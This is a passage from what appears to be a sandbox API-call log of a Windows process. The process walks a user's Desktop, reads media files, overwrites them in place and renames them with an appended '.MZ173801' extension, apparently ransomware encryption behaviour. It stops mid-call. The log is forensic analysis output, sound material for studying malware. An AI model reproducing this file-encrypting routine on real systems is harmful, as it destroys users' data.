GetCurrentThreadId () returned 0x1358 [0123.318] GetCurrentThreadId () returned 0x1358 [0123.318] GetCurrentThreadId () returned 0x1358 [0123.318] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x520f7810, ftCreationTime.dwHighDateTime=0x1d5e126, ftLastAccessTime.dwLowDateTime=0x9ba2a800, ftLastAccessTime.dwHighDateTime=0x1d5e73c, ftLastWriteTime.dwLowDateTime=0x9ba2a800, ftLastWriteTime.dwHighDateTime=0x1d5e73c, nFileSizeHigh=0x0, nFileSizeLow=0x72d3, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="RHvCNbn.mp4", cAlternateFileName="")) returned 1 [0123.318] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.318] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.318] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\RHvCNbn.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\rhvcnbn.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x520f7810, ftCreationTime.dwHighDateTime=0x1d5e126, ftLastAccessTime.dwLowDateTime=0x9ba2a800, ftLastAccessTime.dwHighDateTime=0x1d5e73c, ftLastWriteTime.dwLowDateTime=0x9ba2a800, ftLastWriteTime.dwHighDateTime=0x1d5e73c, nFileSizeHigh=0x0, nFileSizeLow=0x72d3)) returned 1 [0123.319] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.319] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.319] GetCurrentThreadId () returned 0x1358 [0123.319] GetCurrentThreadId () returned 0x1358 [0123.319] GetCurrentThreadId () returned 0x1358 [0123.320] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.320] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.320] GetCurrentThreadId () returned 0x1358 [0123.320] GetCurrentThreadId () returned 0x1358 [0123.320] GetCurrentThreadId () returned 0x1358 [0123.320] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\RHvCNbn.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\rhvcnbn.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.320] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.320] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.320] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x72d3 [0123.320] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.320] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x72d3, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x72d3, lpOverlapped=0x0) returned 1 [0123.321] CloseHandle (hObject=0x410) returned 1 [0123.322] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\RHvCNbn.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\rhvcnbn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.323] WriteFile (in: hFile=0x410, lpBuffer=0x2439b60*, nNumberOfBytesToWrite=0x72d3, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2439b60*, lpNumberOfBytesWritten=0x19f9bc*=0x72d3, lpOverlapped=0x0) returned 1 [0123.324] CloseHandle (hObject=0x410) returned 1 [0123.324] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\RHvCNbn.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\rhvcnbn.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\RHvCNbn.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\rhvcnbn.mp4.mz173801")) returned 1 [0123.325] GetCurrentThreadId () returned 0x1358 [0123.325] GetCurrentThreadId () returned 0x1358 [0123.325] GetCurrentThreadId () returned 0x1358 [0123.325] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf7a2780, ftCreationTime.dwHighDateTime=0x1d5e0fb, ftLastAccessTime.dwLowDateTime=0x6c211130, ftLastAccessTime.dwHighDateTime=0x1d5e592, ftLastWriteTime.dwLowDateTime=0x6c211130, ftLastWriteTime.dwHighDateTime=0x1d5e592, nFileSizeHigh=0x0, nFileSizeLow=0x2f8d, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sCm_S8YjQxWQT08.m4a", cAlternateFileName="SCM_S8~1.M4A")) returned 1 [0123.325] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.325] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.325] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\sCm_S8YjQxWQT08.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\scm_s8yjqxwqt08.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf7a2780, ftCreationTime.dwHighDateTime=0x1d5e0fb, ftLastAccessTime.dwLowDateTime=0x6c211130, ftLastAccessTime.dwHighDateTime=0x1d5e592, ftLastWriteTime.dwLowDateTime=0x6c211130, ftLastWriteTime.dwHighDateTime=0x1d5e592, nFileSizeHigh=0x0, nFileSizeLow=0x2f8d)) returned 1 [0123.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.327] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sCm_S8YjQxWQT08.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\scm_s8yjqxwqt08.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.327] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.327] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.327] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x2f8d [0123.327] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.327] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x2f8d, 